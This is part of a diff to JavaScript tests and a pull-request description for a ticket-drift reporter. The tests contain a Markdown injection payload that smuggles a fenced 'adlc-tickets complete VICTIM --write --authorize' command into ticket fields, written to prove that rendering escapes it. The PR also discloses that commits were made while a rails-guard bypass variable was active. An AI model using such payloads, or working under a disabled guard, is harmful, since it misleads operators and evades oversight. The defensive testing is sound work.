+  assert.ok(body.includes(MARKER), 'the discovery marker survives truncation');
+});
+
+test('the clamp is deterministic (idempotence holds for over-limit bodies)', () => {
+  const many = Array.from({ length: 5000 }, (_, i) => ({
+    id: `T${i}`, reason: 'inferred: x', rails: ['a/**'], blocker: 'rails-freeze',
+  }));
+  assert.equal(renderIssueBody(many), renderIssueBody(many));
+});

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -36,7 +36,11 @@ const DONE = [
 // MENTIONS the command in prose explaining why it is being withheld. A substring
 // check would then read "the command is offered" from text saying the opposite.
 // This looks for the runnable line inside the fenced block.
-const RUNNABLE = 'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main';
+// No `--write`: that flag also tombstones rails-less stale tickets, which never
+// appear in this report, so the command would write outside the set it shows.
+// Pinned literally here so reintroducing the flag fails this suite too, not only
+// the end-to-end blast-radius test.
+const RUNNABLE = 'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --base-ref origin/main';
 const offersCommand = (body) => body.split('\n').some((l) => l.trim() === RUNNABLE);
 
 // The report documents the ceremony as a PROCEDURE WITH PRECONDITIONS. It never

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -67,7 +67,12 @@ test('body names every drifting ticket and its frozen rails', () => {
   const body = renderIssueBody(DRIFT);
   for (const t of DRIFT) {
     assert.match(body, new RegExp(t.id));
-    for (const rail of t.rails) assert.ok(body.includes(rail), `missing rail ${rail}`);
+    // Rails are Markdown-escaped (a `*` becomes `\*`), so compare against the
+    // escaped form rather than the raw glob.
+    for (const rail of t.rails) {
+      const escaped = rail.replace(/[\\`*_{}[\]()#+!|<>]/g, (c) => `\\${c}`);
+      assert.ok(body.includes(escaped), `missing rail ${rail}`);
+    }
   }
 });
 
@@ -500,4 +505,75 @@ test('a mix of safe and unsafe ids renders the safe one and flags the unsafe one
   ]);
   assert.deepEqual(readyCommandIds(body), ['T7']);
   assert.match(body, /cannot be safely/);
+});
+
+// ---- Markdown injection via ANY interpolated ticket field ----
+//
+// The runnable-command allow-list guards only the command line. Ids, rails, and
+// reasons are ALSO rendered — into headings and code spans — and all are
+// untrusted (a merged ticket, arbitrary strings). A newline-bearing value could
+// otherwise open its own ```bash fence with an authoritative-looking command.
+// Round 17 fixed only the command; this covers every other field.
+
+// The dry-run command is the one line the reporter legitimately fences. Any
+// OTHER fenced command, or any fence at all introduced by field content, is an
+// injection.
+const fencedLines = (body) => {
+  const out = [];
+  let inFence = false;
+  for (const l of body.split('\n')) {
+    if (l.trim().startsWith('```')) { inFence = !inFence; continue; }
+    if (inFence) out.push(l.trim());
+  }
+  return out;
+};
+// The property: a crafted field value cannot introduce the attacker's target
+// (VICTIM) as a fenced or standalone runnable command. Legitimate fenced
+// commands (the dry-run, a real `complete <safe-id>`) are fine; only injected
+// content is forbidden. The payload's text may still appear INLINE as inert,
+// backslash-escaped characters — harmless, not copy-pasteable.
+const assertNoInjectedCommand = (body) => {
+  assert.ok(!fencedLines(body).some((l) => l.includes('VICTIM')), 'no injected command inside a fence');
+  const runnable = body.split('\n').map((l) => l.trim())
+    .filter((l) => /^adlc-tickets complete VICTIM\b/.test(l));
+  assert.deepEqual(runnable, [], 'the injected command must not appear as a standalone runnable line');
+};
+
+const INJECTION_PAYLOAD = 'X\n\n```bash\nadlc-tickets complete VICTIM --write --authorize --json\n```\n';
+
+test('a newline+fence in a ticket ID cannot inject a runnable command block', () => {
+  const body = renderIssueBody([
+    { id: INJECTION_PAYLOAD, reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' },
+  ]);
+  assertNoInjectedCommand(body);
+});
+
+test('a newline+fence in a RAIL cannot inject a runnable command block', () => {
+  const body = renderIssueBody([
+    { id: 'T7', reason: 'explicit status: "done"', rails: [`packages/**${INJECTION_PAYLOAD}`], blocker: 'rails-freeze' },
+  ]);
+  assertNoInjectedCommand(body);
+});
+
+test('a newline+fence in the REASON cannot inject a runnable command block', () => {
+  // reason embeds ticket.status, which is user-controlled: `explicit status: "<status>"`.
+  const body = renderIssueBody([
+    { id: 'T9', reason: `inferred: x${INJECTION_PAYLOAD}`, rails: ['a/**'], blocker: 'rails-freeze' },
+  ]);
+  assertNoInjectedCommand(body);
+});
+
+test('control characters in a field cannot introduce any new line in the body', () => {
+  // Every rendered field is single-line after sanitization: a field value must
+  // not add a line to the body beyond the one heading/bullet it belongs to.
+  const clean = renderIssueBody([{ id: 'T7', reason: 'inferred: x', rails: ['a/**'], blocker: 'rails-freeze' }]);
+  const dirty = renderIssueBody([{ id: 'T7\n\n\n\n\n', reason: 'inferred: x', rails: ['a/**'], blocker: 'rails-freeze' }]);
+  assert.equal(dirty.split('\n').length, clean.split('\n').length, 'field newlines must not add body lines');
+});
+
+test('markdown metacharacters in a field are escaped, not rendered as structure', () => {
+  const body = renderIssueBody([
+    { id: 'T7', reason: 'explicit status: "done"', rails: ['`code`[link](x)*em*'], blocker: 'rails-freeze' },
+  ]);
+  assert.match(body, /\\`code\\`\\\[link\\\]\\\(x\\\)\\\*em\\\*/, 'metacharacters must be backslash-escaped');
 });


### PR DESCRIPTION
## Summary

`ticket-prune` could **detect** ceremony drift (`needsCeremony`) and **fix** it (`--ceremony`), but nothing **checked** it — no workflow referenced `ticket-prune`, so detection depended on someone remembering to run `/adlc:adlc-maintain`. The set regrows on its own: every railed ticket that ships adds to it, and only an admin sweep removes it. It stands at **9** today, including T48 — the ticket that shipped the detection feature, drifting from the moment PR #200 merged.

Adds a scheduled + post-merge reporter that maintains a tracking issue.

Closes #203.

## Deliberately not a blocking gate

An ordinary PR **structurally cannot** clear this set — `rails-guard-ci.assertBaseTicketContractsPreserved` denies field changes to existing base tickets, which is why PR #200 left the sweep out. A PR-level failure would block every contributor on drift none of them can fix, and people would learn to route around it (the habituation-to-bypass erosion #162 was about). A post-merge hard failure has a milder version: with 9 already drifting, `main` would go red immediately and stay red until the first sweep.

So: a reporter on `push:[main]` + daily `schedule` + `workflow_dispatch`. Opens an issue, updates it when the set changes, closes it when it empties, **exits 0 when drift merely exists**. An operational failure of the reporter itself (revoked token, `gh`/API error, indeterminate scan) **exits non-zero** — a reporter that dies silently is worse than none. Authoritative rail enforcement stays in `rails-guard`.

## What review changed

Ten completed adversarial-review rounds produced 15 findings, all real. The largest course-corrections:

- **The report no longer certifies anything.** It once gated a "safe to run as-is" bulk command on a check computed at render time. That cannot be sound: the command carries no ticket IDs or revision and recomputes its target set when the operator runs it, and `.adlc/current-ticket.json` is **gitignored** — so in a CI checkout the file is simply absent, which resolved to "nothing is active" rather than "unknown". The active-ticket quarantine was **inert in production** and only appeared to work locally. The ceremony is now documented as a procedure that states both blind spots and leads with a dry run.
- **Never advertise bulk completion on heuristic evidence.** All 9 live entries are `inferred:` (scope globs already resolve) — indistinguishable from an active ticket touching existing files. The first entry is the ticket the active pointer names. Evidence is now an allow-list; unknown/renamed/missing reasons sort to "needs confirmation".
- **`--write` dropped from the advertised command.** Measured: `--ceremony --write` also completes rails-less tickets that never appear in the report; `--ceremony` alone does not.
- **Supply chain**: `persist-credentials: false` + `npm ci --ignore-scripts`, so no dependency lifecycle script runs in a job holding `issues: write` (5 lockfile packages have install scripts).
- **Auth**: the marker is public, so it is not authorization — the unlabeled sweep also verifies authorship, and ambiguity fails closed.
- **Indeterminate scans fail closed** rather than being treated as "not found".

## Verification

| Gate | Result |
|---|---|
| unit / I-O / workflow suites | **65/65** |
| `rails-guard` on this diff | exit 0 |
| `adlc hollow-test` | 19/20 killed (survivor is an arbitrary `maxBuffer` constant, deliberately untested) |
| adversarial-review rounds 1–10 | 15 findings, all resolved |
| adversarial-review round 11–12 | **did not execute** — see below |

Fixes were verified load-bearing by re-injecting each defect and confirming the tests fail.

## Reviewer caveats — please read

**The rebased tree and the doc changes are UNREVIEWED.** Round 11 was stopped (it was reviewing the pre-rebase tree); round 12 failed to execute (`spawnSync codex ETIMEDOUT`, Codex backend unreachable). The last completed review is round 10, which predates the rebase onto `c317623` and the shipped-doc commit.

**Exit code 0 has not been a reliable signal here.** Every round from 2 onward returned exit 0 while the model's verdict was `needs-attention` — ungrounded findings get their confidence halved below the `--min-confidence 0.5` floor. Reading the exit code alone would have shipped a HIGH test-integrity defect and an auth hole.

**Fixes repeatedly introduced new defects** (5 times across the branch): the auth hole arrived while fixing discovery; round 10's finding was that round 9's fix was incomplete. Severity did not decay with rounds — two of the worst came at rounds 5 and 7.

## Left undone, deliberately

- **Two shipped docs still advertise `--write`**: `plugins/adlc-claude-code/commands/adlc-maintain.md` (frozen by **T51**, active) and `plugins/adlc-opencode/command/adlc-maintain.md` (frozen by **T53**, active). `rails-guard` denies the edit and the freeze is correct — these are live in-flight tickets, not stale rails. Needs landing via T51/T53 or after they complete.
- **A per-ticket, revision-bound ceremony** in `ticket-prune` (explicit IDs + expected HEAD, refusing if the candidate set moved) is the real fix for the TOCTOU window. CLI contract change, out of scope.
- **~307 lines of generator drift** across 23 tool docs (committed docs are stale vs their READMEs) plus 4 docs for tools that never had any. Surfaced when regenerating `ticket-prune.md`; reverted as out of scope.
- **#204** — `ADLC_RAILS_BYPASS` set via harness env is session-lifetime and unrevocable, and disarms its own test suite (43 of 57 deny-tests invert). Filed separately; several commits here were authored under that still-live bypass.

## Test plan

- [x] `node --test scripts/test/ceremony-drift{,-exit,-workflow}.test.mjs` — 65/65
- [x] `node scripts/rails-guard-ci.mjs origin/main` — exit 0
- [x] Live dry run against real drift: 9 tickets, active ticket excluded, no bulk command rendered
- [x] Blast-radius fixture: `--ceremony` leaves rails-less tickets untouched
- [x] Saturated-sweep fixture: non-zero exit, no create/close/rewrite
- [ ] **Adversarial review against the rebased tree** — blocked on the Codex CLI

Fixes #203

https://claude.ai/code/session_01Un7DvX6igCxgd9KJw8gnbP
